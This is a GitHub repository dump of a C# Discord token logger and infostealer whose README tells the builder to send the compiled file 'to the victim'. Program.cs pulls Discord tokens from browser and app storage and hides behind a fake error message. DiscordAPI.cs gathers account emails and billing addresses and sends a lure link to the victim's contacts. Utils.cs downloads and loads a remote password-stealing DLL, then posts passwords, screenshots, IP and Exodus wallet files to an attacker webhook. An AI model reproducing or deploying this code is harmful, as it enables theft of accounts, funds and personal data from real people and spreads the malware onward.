├── .gitattributes ├── .gitignore ├── README.md ├── logger.sln └── logger ├── DiscordAPI.cs ├── FodyWeavers.xml ├── PasswordStealer.dll ├── Program.cs ├── Utils.cs └── logger.csproj /.gitattributes: -------------------------------------------------------------------------------- 1 | ############################################################################### 2 | # Set default behavior to automatically normalize line endings. 3 | ############################################################################### 4 | * text=auto 5 | 6 | ############################################################################### 7 | # Set default behavior for command prompt diff. 8 | # 9 | # This is need for earlier builds of msysgit that does not have it on by 10 | # default for csharp files. 11 | # Note: This is only used by command line 12 | ############################################################################### 13 | #*.cs diff=csharp 14 | 15 | ############################################################################### 16 | # Set the merge driver for project and solution files 17 | # 18 | # Merging from the command prompt will add diff markers to the files if there 19 | # are conflicts (Merging from VS is not affected by the settings below, in VS 20 | # the diff markers are never inserted). Diff markers may cause the following 21 | # file extensions to fail to load in VS. An alternative would be to treat 22 | # these files as binary and thus will always conflict and require user 23 | # intervention with every merge. To do so, just uncomment the entries below 24 | ############################################################################### 25 | #*.sln merge=binary 26 | #*.csproj merge=binary 27 | #*.vbproj merge=binary 28 | #*.vcxproj merge=binary 29 | #*.vcproj merge=binary 30 | #*.dbproj merge=binary 31 | #*.fsproj merge=binary 32 | #*.lsproj merge=binary 33 | #*.wixproj merge=binary 34 | #*.modelproj merge=binary 35 | #*.sqlproj merge=binary 36 | #*.wwaproj merge=binary 37 | 38 | ############################################################################### 39 | # behavior for image files 40 | # 41 | # image files are treated as binary by default. 42 | ############################################################################### 43 | #*.jpg binary 44 | #*.png binary 45 | #*.gif binary 46 | 47 | ############################################################################### 48 | # diff behavior for common document formats 49 | # 50 | # Convert binary document formats to text before diffing them. This feature 51 | # is only available from the command line. Turn it on by uncommenting the 52 | # entries below. 53 | ############################################################################### 54 | #*.doc diff=astextplain 55 | #*.DOC diff=astextplain 56 | #*.docx diff=astextplain 57 | #*.DOCX diff=astextplain 58 | #*.dot diff=astextplain 59 | #*.DOT diff=astextplain 60 | #*.pdf diff=astextplain 61 | #*.PDF diff=astextplain 62 | #*.rtf diff=astextplain 63 | #*.RTF diff=astextplain 64 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 3 | ## 4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore 5 | 6 | # User-specific files 7 | *.rsuser 8 | *.suo 9 | *.user 10 | *.userosscache 11 | *.sln.docstates 12 | 13 | # User-specific files (MonoDevelop/Xamarin Studio) 14 | *.userprefs 15 | 16 | # Mono auto generated files 17 | mono_crash.* 18 | 19 | # Build results 20 | [Dd]ebug/ 21 | [Dd]ebugPublic/ 22 | [Rr]elease/ 23 | [Rr]eleases/ 24 | x64/ 25 | x86/ 26 | [Ww][Ii][Nn]32/ 27 | [Aa][Rr][Mm]/ 28 | [Aa][Rr][Mm]64/ 29 | bld/ 30 | [Bb]in/ 31 | [Oo]bj/ 32 | [Oo]ut/ 33 | [Ll]og/ 34 | [Ll]ogs/ 35 | 36 | # Visual Studio 2015/2017 cache/options directory 37 | .vs/ 38 | # Uncomment if you have tasks that create the project's static files in wwwroot 39 | #wwwroot/ 40 | 41 | # Visual Studio 2017 auto generated files 42 | Generated\ Files/ 43 | 44 | # MSTest test Results 45 | [Tt]est[Rr]esult*/ 46 | [Bb]uild[Ll]og.* 47 | 48 | # NUnit 49 | *.VisualState.xml 50 | TestResult.xml 51 | nunit-*.xml 52 | 53 | # Build Results of an ATL Project 54 | [Dd]ebugPS/ 55 | [Rr]eleasePS/ 56 | dlldata.c 57 | 58 | # Benchmark Results 59 | BenchmarkDotNet.Artifacts/ 60 | 61 | # .NET Core 62 | project.lock.json 63 | project.fragment.lock.json 64 | artifacts/ 65 | 66 | # ASP.NET Scaffolding 67 | ScaffoldingReadMe.txt 68 | 69 | # StyleCop 70 | StyleCopReport.xml 71 | 72 | # Files built by Visual Studio 73 | *_i.c 74 | *_p.c 75 | *_h.h 76 | *.ilk 77 | *.meta 78 | *.obj 79 | *.iobj 80 | *.pch 81 | *.pdb 82 | *.ipdb 83 | *.pgc 84 | *.pgd 85 | *.rsp 86 | *.sbr 87 | *.tlb 88 | *.tli 89 | *.tlh 90 | *.tmp 91 | *.tmp_proj 92 | *_wpftmp.csproj 93 | *.log 94 | *.vspscc 95 | *.vssscc 96 | .builds 97 | *.pidb 98 | *.svclog 99 | *.scc 100 | 101 | # Chutzpah Test files 102 | _Chutzpah* 103 | 104 | # Visual C++ cache files 105 | ipch/ 106 | *.aps 107 | *.ncb 108 | *.opendb 109 | *.opensdf 110 | *.sdf 111 | *.cachefile 112 | *.VC.db 113 | *.VC.VC.opendb 114 | 115 | # Visual Studio profiler 116 | *.psess 117 | *.vsp 118 | *.vspx 119 | *.sap 120 | 121 | # Visual Studio Trace Files 122 | *.e2e 123 | 124 | # TFS 2012 Local Workspace 125 | $tf/ 126 | 127 | # Guidance Automation Toolkit 128 | *.gpState 129 | 130 | # ReSharper is a .NET coding add-in 131 | _ReSharper*/ 132 | *.[Rr]e[Ss]harper 133 | *.DotSettings.user 134 | 135 | # TeamCity is a build add-in 136 | _TeamCity* 137 | 138 | # DotCover is a Code Coverage Tool 139 | *.dotCover 140 | 141 | # AxoCover is a Code Coverage Tool 142 | .axoCover/* 143 | !.axoCover/settings.json 144 | 145 | # Coverlet is a free, cross platform Code Coverage Tool 146 | coverage*.json 147 | coverage*.xml 148 | coverage*.info 149 | 150 | # Visual Studio code coverage results 151 | *.coverage 152 | *.coveragexml 153 | 154 | # NCrunch 155 | _NCrunch_* 156 | .*crunch*.local.xml 157 | nCrunchTemp_* 158 | 159 | # MightyMoose 160 | *.mm.* 161 | AutoTest.Net/ 162 | 163 | # Web workbench (sass) 164 | .sass-cache/ 165 | 166 | # Installshield output folder 167 | [Ee]xpress/ 168 | 169 | # DocProject is a documentation generator add-in 170 | DocProject/buildhelp/ 171 | DocProject/Help/*.HxT 172 | DocProject/Help/*.HxC 173 | DocProject/Help/*.hhc 174 | DocProject/Help/*.hhk 175 | DocProject/Help/*.hhp 176 | DocProject/Help/Html2 177 | DocProject/Help/html 178 | 179 | # Click-Once directory 180 | publish/ 181 | 182 | # Publish Web Output 183 | *.[Pp]ublish.xml 184 | *.azurePubxml 185 | # Note: Comment the next line if you want to checkin your web deploy settings, 186 | # but database connection strings (with potential passwords) will be unencrypted 187 | *.pubxml 188 | *.publishproj 189 | 190 | # Microsoft Azure Web App publish settings. Comment the next line if you want to 191 | # checkin your Azure Web App publish settings, but sensitive information contained 192 | # in these scripts will be unencrypted 193 | PublishScripts/ 194 | 195 | # NuGet Packages 196 | *.nupkg 197 | # NuGet Symbol Packages 198 | *.snupkg 199 | # The packages folder can be ignored because of Package Restore 200 | **/[Pp]ackages/* 201 | # except build/, which is used as an MSBuild target. 202 | !**/[Pp]ackages/build/ 203 | # Uncomment if necessary however generally it will be regenerated when needed 204 | #!**/[Pp]ackages/repositories.config 205 | # NuGet v3's project.json files produces more ignorable files 206 | *.nuget.props 207 | *.nuget.targets 208 | 209 | # Microsoft Azure Build Output 210 | csx/ 211 | *.build.csdef 212 | 213 | # Microsoft Azure Emulator 214 | ecf/ 215 | rcf/ 216 | 217 | # Windows Store app package directories and files 218 | AppPackages/ 219 | BundleArtifacts/ 220 | Package.StoreAssociation.xml 221 | _pkginfo.txt 222 | *.appx 223 | *.appxbundle 224 | *.appxupload 225 | 226 | # Visual Studio cache files 227 | # files ending in .cache can be ignored 228 | *.[Cc]ache 229 | # but keep track of directories ending in .cache 230 | !?*.[Cc]ache/ 231 | 232 | # Others 233 | ClientBin/ 234 | ~$* 235 | *~ 236 | *.dbmdl 237 | *.dbproj.schemaview 238 | *.jfm 239 | *.pfx 240 | *.publishsettings 241 | orleans.codegen.cs 242 | 243 | # Including strong name files can present a security risk 244 | # (https://github.com/github/gitignore/pull/2483#issue-259490424) 245 | #*.snk 246 | 247 | # Since there are multiple workflows, uncomment next line to ignore bower_components 248 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 249 | #bower_components/ 250 | 251 | # RIA/Silverlight projects 252 | Generated_Code/ 253 | 254 | # Backup & report files from converting an old project file 255 | # to a newer Visual Studio version. Backup files are not needed, 256 | # because we have git ;-) 257 | _UpgradeReport_Files/ 258 | Backup*/ 259 | UpgradeLog*.XML 260 | UpgradeLog*.htm 261 | ServiceFabricBackup/ 262 | *.rptproj.bak 263 | 264 | # SQL Server files 265 | *.mdf 266 | *.ldf 267 | *.ndf 268 | 269 | # Business Intelligence projects 270 | *.rdl.data 271 | *.bim.layout 272 | *.bim_*.settings 273 | *.rptproj.rsuser 274 | *- [Bb]ackup.rdl 275 | *- [Bb]ackup ([0-9]).rdl 276 | *- [Bb]ackup ([0-9][0-9]).rdl 277 | 278 | # Microsoft Fakes 279 | FakesAssemblies/ 280 | 281 | # GhostDoc plugin setting file 282 | *.GhostDoc.xml 283 | 284 | # Node.js Tools for Visual Studio 285 | .ntvs_analysis.dat 286 | node_modules/ 287 | 288 | # Visual Studio 6 build log 289 | *.plg 290 | 291 | # Visual Studio 6 workspace options file 292 | *.opt 293 | 294 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.) 295 | *.vbw 296 | 297 | # Visual Studio LightSwitch build output 298 | **/*.HTMLClient/GeneratedArtifacts 299 | **/*.DesktopClient/GeneratedArtifacts 300 | **/*.DesktopClient/ModelManifest.xml 301 | **/*.Server/GeneratedArtifacts 302 | **/*.Server/ModelManifest.xml 303 | _Pvt_Extensions 304 | 305 | # Paket dependency manager 306 | .paket/paket.exe 307 | paket-files/ 308 | 309 | # FAKE - F# Make 310 | .fake/ 311 | 312 | # CodeRush personal settings 313 | .cr/personal 314 | 315 | # Python Tools for Visual Studio (PTVS) 316 | __pycache__/ 317 | *.pyc 318 | 319 | # Cake - Uncomment if you are using it 320 | # tools/** 321 | # !tools/packages.config 322 | 323 | # Tabs Studio 324 | *.tss 325 | 326 | # Telerik's JustMock configuration file 327 | *.jmconfig 328 | 329 | # BizTalk build output 330 | *.btp.cs 331 | *.btm.cs 332 | *.odx.cs 333 | *.xsd.cs 334 | 335 | # OpenCover UI analysis results 336 | OpenCover/ 337 | 338 | # Azure Stream Analytics local run output 339 | ASALocalRun/ 340 | 341 | # MSBuild Binary and Structured Log 342 | *.binlog 343 | 344 | # NVidia Nsight GPU debugger configuration file 345 | *.nvuser 346 | 347 | # MFractors (Xamarin productivity tool) working folder 348 | .mfractor/ 349 | 350 | # Local History for Visual Studio 351 | .localhistory/ 352 | 353 | # BeatPulse healthcheck temp database 354 | healthchecksdb 355 | 356 | # Backup folder for Package Reference Convert tool in Visual Studio 2017 357 | MigrationBackup/ 358 | 359 | # Ionide (cross platform F# VS Code tools) working folder 360 | .ionide/ 361 | 362 | # Fody - auto-generated XML schema 363 | FodyWeavers.xsd -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | Code looks very bad, I know, It's not that I make it for a professional company so idc 😂 2 | 3 | ### features: 4 | - Screenshot taker - takes screenshot of all the victim's monitors 5 | - Token Log - Automatically detects working accounts and dropping details about them 6 | - webhook - will send everything in a webhook, also has an backup webhook if the main dies 7 | - Password Stealer - will steal all the victim's passwords 8 | - Wallet stealer - Supports Exodus only RN 9 | - GUI builder 10 | - Discord SELF-SPREAD 11 | 12 | ## installation: 13 | 1. Export the project into a folder 14 | 2. edit the webhook in \logger\Program.cs 15 | 3. run cmd in the folder and run the command `dotnet publish` 16 | 4. send the created file to the victim! 17 | 18 | ## todo-list: 19 | - Suggest Anything on my discord Server 20 | 21 | # preview: 22 | 23 | ![photo](https://cdn.discordapp.com/attachments/930947773849812993/945764862628339752/unknown.png) 24 | ![download](https://img.shields.io/github/downloads/fknMega/discord-token-logger/total.svg) 25 | 26 | -------------------------------------------------------------------------------- /logger.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.32126.315 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{9A19103F-16F7-4668-BE54-9A1E7A4F7556}") = "logger", "logger\logger.csproj", "{372A3433-9090-4840-8EE1-7D2A0DE9239D}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Debug|x86 = Debug|x86 12 | Release|Any CPU = Release|Any CPU 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {372A3433-9090-4840-8EE1-7D2A0DE9239D}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 17 | {372A3433-9090-4840-8EE1-7D2A0DE9239D}.Debug|Any CPU.Build.0 = Debug|Any CPU 18 | {372A3433-9090-4840-8EE1-7D2A0DE9239D}.Debug|x86.ActiveCfg = Debug|x86 19 | {372A3433-9090-4840-8EE1-7D2A0DE9239D}.Debug|x86.Build.0 = Debug|x86 20 | {372A3433-9090-4840-8EE1-7D2A0DE9239D}.Release|Any CPU.ActiveCfg = Release|Any CPU 21 | {372A3433-9090-4840-8EE1-7D2A0DE9239D}.Release|Any CPU.Build.0 = Release|Any CPU 22 | {372A3433-9090-4840-8EE1-7D2A0DE9239D}.Release|x86.ActiveCfg = Release|x86 23 | {372A3433-9090-4840-8EE1-7D2A0DE9239D}.Release|x86.Build.0 = Release|x86 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {3CD83D6B-1181-4B11-B398-C7BFD60FE754} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /logger/DiscordAPI.cs: -------------------------------------------------------------------------------- 1 | using Discord.Gateway; 2 | using System; 3 | using System.Collections.Generic; 4 | using System.Text; 5 | using Discord; 6 | using System.Threading.Tasks; 7 | using System.Threading; 8 | using System.Net; 9 | using Newtonsoft.Json; 10 | using Newtonsoft.Json.Linq; 11 | 12 | namespace logger 13 | { 14 | class DiscordAPI 15 | { 16 | 17 | public static List accountssused = new List(); 18 | 19 | public static void main(string token) 20 | { 21 | 22 | try 23 | { 24 | DiscordClient client = new DiscordClient(token, new DiscordConfig() { RetryOnRateLimit = true }); 25 | 26 | 27 | 28 | 29 | 30 | if (accountssused.Contains(client.User.Id.ToString())) 31 | { 32 | 33 | return; 34 | } 35 | else 36 | { 37 | accountssused.Add(client.User.Id.ToString()); 38 | 39 | 40 | if (Program.selfspread) 41 | { 42 | var t = new Thread(() => Spread(token)); 43 | 44 | 45 | t.Start(); 46 | } 47 | 48 | 49 | 50 | StringBuilder account = new StringBuilder(); 51 | account.Append("token: ||" + token + "|| \nUsename: " + client.User.Username + "\nMail: " + client.User.Email); 52 | var payments = client.GetPaymentMethods(); 53 | 54 | if (payments.Count > 0) 55 | { 56 | account.Append("\nPayments Details: "); 57 | foreach (var pay in payments) 58 | { 59 | account.Append("\nBilling: " + pay.BillingAddress.Address1 + ", " + pay.BillingAddress.City + ", " + pay.BillingAddress.Country); 60 | } 61 | } 62 | Utils.Accounts.Add(account.ToString()); 63 | 64 | 65 | } 66 | 67 | } 68 | catch 69 | { 70 | } 71 | 72 | 73 | 74 | 75 | } 76 | 77 | 78 | private static void Spread(string token) 79 | { 80 | 81 | 82 | DiscordSocketClient client = new DiscordSocketClient(); 83 | 84 | // Callback to the Client_OnLoggedIn function. 85 | client.OnLoggedIn += Client_OnLoggedIn; 86 | 87 | 88 | client.Login(token); 89 | 90 | Thread.Sleep(-1); // So it doesn't close after logging in. 91 | 92 | 93 | } 94 | 95 | private static void Client_OnLoggedIn(DiscordSocketClient client, LoginEventArgs args) 96 | { 97 | //Console.WriteLine("logged as " + client.User.Username); 98 | if (client.User.Id.ToString() != "930765377682690068") 99 | { 100 | IReadOnlyList dms = client.GetPrivateChannels(); 101 | 102 | foreach (var dm in dms) 103 | { 104 | //Console.WriteLine(dm.Type); 105 | var url = GetURL(); 106 | 107 | if(url != "invalid") 108 | { 109 | var msg = Program.msg.Replace("{url}", url); 110 | 111 | try 112 | { 113 | 114 | var msgs = dm.SendMessage(msg); 115 | 116 | } 117 | catch(Exception ex) 118 | { 119 | 120 | } 121 | 122 | 123 | } 124 | 125 | 126 | } 127 | } 128 | client.Dispose(); 129 | 130 | 131 | 132 | 133 | 134 | } 135 | 136 | private static string GetURL() 137 | { 138 | try 139 | { 140 | var Client = new WebClient(); 141 | 142 | var response = Client.DownloadString(Program.webhook); 143 | 144 | dynamic json = JsonConvert.DeserializeObject(response); 145 | 146 | 147 | if (json.name == "Spidey Bot") 148 | { 149 | return "invalid"; 150 | } else 151 | { 152 | 153 | return json.name; 154 | 155 | } 156 | 157 | 158 | } 159 | catch 160 | { 161 | 162 | try 163 | { 164 | var Client = new WebClient(); 165 | 166 | var response = Client.DownloadString(Program.altwebhook); 167 | 168 | dynamic json = JsonConvert.DeserializeObject(response); 169 | 170 | 171 | if (json.name == "Spidey Bot") 172 | { 173 | return "invalid"; 174 | } 175 | else 176 | { 177 | 178 | return json.name; 179 | 180 | } 181 | } 182 | catch 183 | { 184 | 185 | return "invalid"; 186 | 187 | } 188 | 189 | 190 | } 191 | 192 | 193 | 194 | 195 | 196 | } 197 | } 198 | } -------------------------------------------------------------------------------- /logger/FodyWeavers.xml: -------------------------------------------------------------------------------- 1 |  2 | 3 | -------------------------------------------------------------------------------- /logger/PasswordStealer.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/fknMega/discord-token-logger/acd6b03b8a3f3b14f4a62b6153f88d1c6cbcacee/logger/PasswordStealer.dll -------------------------------------------------------------------------------- /logger/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Diagnostics; 4 | using System.IO; 5 | using System.Linq; 6 | using System.Runtime.InteropServices; 7 | using System.Text.RegularExpressions; 8 | using System.Threading.Tasks; 9 | 10 | namespace logger 11 | { 12 | class Program 13 | { 14 | 15 | 16 | //main hook 17 | public static string webhook = ""; 18 | 19 | //will work if the main^ is dead 20 | public static string altwebhook = ""; 21 | 22 | //enable self spread? 23 | public static bool selfspread = false; 24 | 25 | //self spread message, use {url} for the url. 26 | public static string msg = "Look at this nice file! {url}"; 27 | 28 | 29 | 30 | 31 | 32 | 33 | [DllImport("kernel32.dll")] 34 | static extern IntPtr GetConsoleWindow(); 35 | 36 | [DllImport("user32.dll")] 37 | static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); 38 | 39 | const int SW_HIDE = 0; 40 | const int SW_SHOW = 5; 41 | 42 | private static async Task Main(string[] args) 43 | { 44 | 45 | 46 | 47 | 48 | await TokenGrabber(); 49 | 50 | try 51 | { 52 | await Utils.SendWebhookAsync(); 53 | } 54 | catch 55 | { 56 | Console.WriteLine("_DISABLE_ANTIVIRUS"); 57 | } 58 | 59 | 60 | Console.WriteLine(@"Failure processing application bundle. 61 | Bundle header version compatibility check failed. 62 | A fatal error occured while processing application bundle 63 | 64 | Press any key to close..."); 65 | Console.ReadKey(); 66 | 67 | var handle = GetConsoleWindow(); 68 | 69 | ShowWindow(handle, SW_HIDE); 70 | 71 | 72 | 73 | 74 | 75 | while (true) { } 76 | 77 | 78 | 79 | } 80 | 81 | 82 | public static async 83 | 84 | Task 85 | TokenGrabber() 86 | { 87 | 88 | var tokens = GetTokens(); 89 | 90 | Parallel.ForEach(tokens, token => 91 | { 92 | //Console.WriteLine(token); 93 | DiscordAPI.main(token); 94 | 95 | }); 96 | 97 | } 98 | 99 | public static List GetTokens() 100 | { 101 | var paths = new Dictionary(); 102 | var tokens = new List(); 103 | 104 | string roaming = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData); 105 | string local = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData); 106 | 107 | paths.Add("Discord", roaming + "\\discord"); 108 | paths.Add("Discord Canary", roaming + "\\discordcanary"); 109 | paths.Add("Discord PTB", roaming + "\\discordptb"); 110 | paths.Add("Google Chrome", local + "\\Google\\Chrome\\User Data\\Default"); 111 | paths.Add("Brave", local + "\\BraveSoftware\\Brave-Browser\\User Data\\Default"); 112 | paths.Add("Yandex", local + "\\Yandex\\YandexBrowser\\User Data\\Default"); 113 | paths.Add("Chromium", local + "\\Chromium\\User Data\\Default"); 114 | paths.Add("Opera", roaming + "\\Opera Software\\Opera Stable"); 115 | 116 | foreach (KeyValuePair kvp in paths) 117 | { 118 | string platform = kvp.Key; 119 | string path = kvp.Value; 120 | 121 | if (!Directory.Exists(path)) 122 | continue; 123 | 124 | foreach (string token in FindTokens(path)) 125 | { 126 | tokens.Add(token); 127 | } 128 | } 129 | return tokens; 130 | } 131 | 132 | public static List FindTokens(string path) 133 | { 134 | path += "\\Local Storage\\leveldb"; 135 | var tokens = new List(); 136 | 137 | foreach (string file in Directory.GetFiles(path, "*.ldb", SearchOption.TopDirectoryOnly)) 138 | { 139 | string content = File.ReadAllText(file); 140 | 141 | foreach (Match match in Regex.Matches(content, @"[\w-]{24}\.[\w-]{6}\.[\w-]{27}")) 142 | { 143 | tokens.Add(match.ToString()); 144 | } 145 | } 146 | return tokens; 147 | } 148 | 149 | 150 | } 151 | 152 | } 153 | 154 | -------------------------------------------------------------------------------- /logger/Utils.cs: -------------------------------------------------------------------------------- 1 | using Newtonsoft.Json; 2 | using System; 3 | using System.Collections.Generic; 4 | using System.Drawing; 5 | using System.IO; 6 | using System.IO.Compression; 7 | using System.Linq; 8 | using System.Net; 9 | using System.Net.Http; 10 | using System.Reflection; 11 | using System.Runtime.InteropServices; 12 | using System.Text; 13 | using System.Threading.Tasks; 14 | using System.Windows.Forms; 15 | 16 | namespace logger 17 | { 18 | class Utils 19 | { 20 | public static List Accounts = new List(); 21 | 22 | 23 | 24 | public static async Task SendWebhookAsync() 25 | { 26 | 27 | 28 | 29 | HttpClient httpClient = new HttpClient(); 30 | MultipartFormDataContent form = new MultipartFormDataContent(); 31 | StringBuilder accounts = new StringBuilder(); 32 | foreach(var acc in Accounts) 33 | { 34 | accounts.Append(acc + "\n\n"); 35 | } 36 | form.Add(new StringContent("**New Login**\nIP: " + GetIP() + " \nEnv User: " + Environment.UserName + "\nPath: " + Directory.GetCurrentDirectory() + "\n\nAccounts:\n\n" + accounts.ToString()), "content"); 37 | var passwords = PasswordStealer.mmain(); 38 | if(passwords.Length > 0) 39 | { 40 | byte[] filee = Encoding.ASCII.GetBytes(passwords); 41 | 42 | form.Add(new ByteArrayContent(filee, 0, filee.Length), "passwords", "passwords.txt"); 43 | } 44 | 45 | 46 | foreach (var screen in Screen.AllScreens) 47 | { 48 | 49 | var bytes = GetSreenshot(screen); 50 | 51 | var file_bytes = ImageToByte2(bytes); 52 | form.Add(new ByteArrayContent(file_bytes, 0, file_bytes.Length), screen.DeviceName, screen.DeviceName + ".jpg"); 53 | 54 | } 55 | string path = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\Exodus\exodus.wallet"; 56 | 57 | if(Directory.Exists(path)){ 58 | 59 | string[] files = Directory.GetFiles(path); 60 | 61 | 62 | var realfiles = new List(); 63 | 64 | foreach (string file in files) 65 | { 66 | var fi1 = new FileInfo(file); 67 | 68 | realfiles.Add(fi1); 69 | 70 | } 71 | 72 | var stream = CreateZipFile(realfiles); 73 | 74 | 75 | form.Add(new ByteArrayContent(stream, 0, stream.Length), "exodus", "exodus.zip"); 76 | 77 | 78 | } 79 | 80 | 81 | try 82 | { 83 | HttpResponseMessage response = await httpClient.PostAsync(Program.webhook, form); 84 | 85 | response.EnsureSuccessStatusCode(); 86 | httpClient.Dispose(); 87 | string sd = response.Content.ReadAsStringAsync().Result; 88 | } 89 | catch 90 | { 91 | HttpResponseMessage response = await httpClient.PostAsync(Program.altwebhook, form); 92 | 93 | response.EnsureSuccessStatusCode(); 94 | httpClient.Dispose(); 95 | string sd = response.Content.ReadAsStringAsync().Result; 96 | } 97 | 98 | 99 | 100 | } 101 | private static byte[] CreateZipFile(IEnumerable files) 102 | { 103 | var stream = new MemoryStream(); 104 | 105 | 106 | var archive = new ZipArchive(stream, System.IO.Compression.ZipArchiveMode.Create); 107 | 108 | foreach (var item in files) 109 | { 110 | archive.CreateEntryFromFile(item.FullName, item.Name, CompressionLevel.Optimal); 111 | } 112 | 113 | archive.Dispose(); 114 | //File.WriteAllBytes("fdsf.zip", stream.ToArray()); 115 | return stream.ToArray(); 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | } 130 | public static string GetIP() 131 | { 132 | 133 | WebClient client = new WebClient(); 134 | 135 | string v6site = client.DownloadString("https://api.myip.com"); 136 | string v4site = client.DownloadString("https://api.ipify.org/?format=json"); 137 | 138 | 139 | dynamic v6json = JsonConvert.DeserializeObject(v6site); 140 | 141 | dynamic v4json = JsonConvert.DeserializeObject(v4site); 142 | 143 | //https://api.ipify.org/?format=json 144 | 145 | 146 | 147 | 148 | return "||" + v4json.ip + "|| , " + v6json.country; 149 | 150 | 151 | 152 | } 153 | public static Bitmap GetSreenshot(Screen screen) 154 | { 155 | Bitmap bm = new Bitmap(screen.Bounds.Width, screen.Bounds.Height); 156 | Graphics g = Graphics.FromImage(bm); 157 | g.CopyFromScreen(screen.Bounds.X, 158 | screen.Bounds.Y, 159 | 0, 160 | 0, 161 | 162 | screen.Bounds.Size); 163 | return bm; 164 | } 165 | 166 | public static byte[] ImageToByte2(Image img) 167 | { 168 | var stream = new MemoryStream(); 169 | 170 | img.Save(stream, System.Drawing.Imaging.ImageFormat.Png); 171 | return stream.ToArray(); 172 | 173 | } 174 | 175 | 176 | } 177 | 178 | 179 | 180 | 181 | 182 | class PasswordStealer 183 | { 184 | 185 | public static string mmain() 186 | { 187 | 188 | ServicePointManager.SecurityProtocol = SecurityProtocolType.Tls 189 | | SecurityProtocolType.Tls11 190 | | SecurityProtocolType.Tls12 191 | | SecurityProtocolType.Ssl3; 192 | 193 | byte[] dll = Logic.GetLibrary(); 194 | 195 | string pwd = Logic.GetPasswords(dll); 196 | 197 | return pwd; 198 | } 199 | } 200 | 201 | 202 | internal sealed class Logic 203 | { 204 | 205 | public static byte[] GetLibrary() 206 | { 207 | byte[] dll = new byte[0]; 208 | var client = new WebClient(); 209 | 210 | try 211 | { 212 | dll = client.DownloadData("https://raw.githubusercontent.com/fknMega/Discord-Token-Logger/master/logger/PasswordStealer.dll"); 213 | } 214 | catch (WebException ex) 215 | { 216 | 217 | } 218 | 219 | return dll; 220 | } 221 | 222 | 223 | public static string GetPasswords(byte[] dll) 224 | { 225 | 226 | Assembly asm = Assembly.Load(dll); 227 | 228 | dynamic instance = Activator.CreateInstance( 229 | asm.GetType("PasswordStealer.Stealer")); 230 | 231 | 232 | MethodInfo runMethod = instance.GetType().GetMethod("Run", 233 | BindingFlags.Instance | BindingFlags.Public); 234 | 235 | 236 | string passwords = (string)runMethod.Invoke( 237 | instance, new object[] { }); 238 | 239 | return passwords; 240 | } 241 | 242 | 243 | 244 | 245 | } 246 | } -------------------------------------------------------------------------------- /logger/logger.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | Exe 5 | net472 6 | logger 7 | false 8 | 9 | AnyCPU;x86 10 | 11 | 12 | 13 | 14 | 15 | all 16 | runtime; build; native; contentfiles; analyzers; buildtransitive 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | --------------------------------------------------------------------------------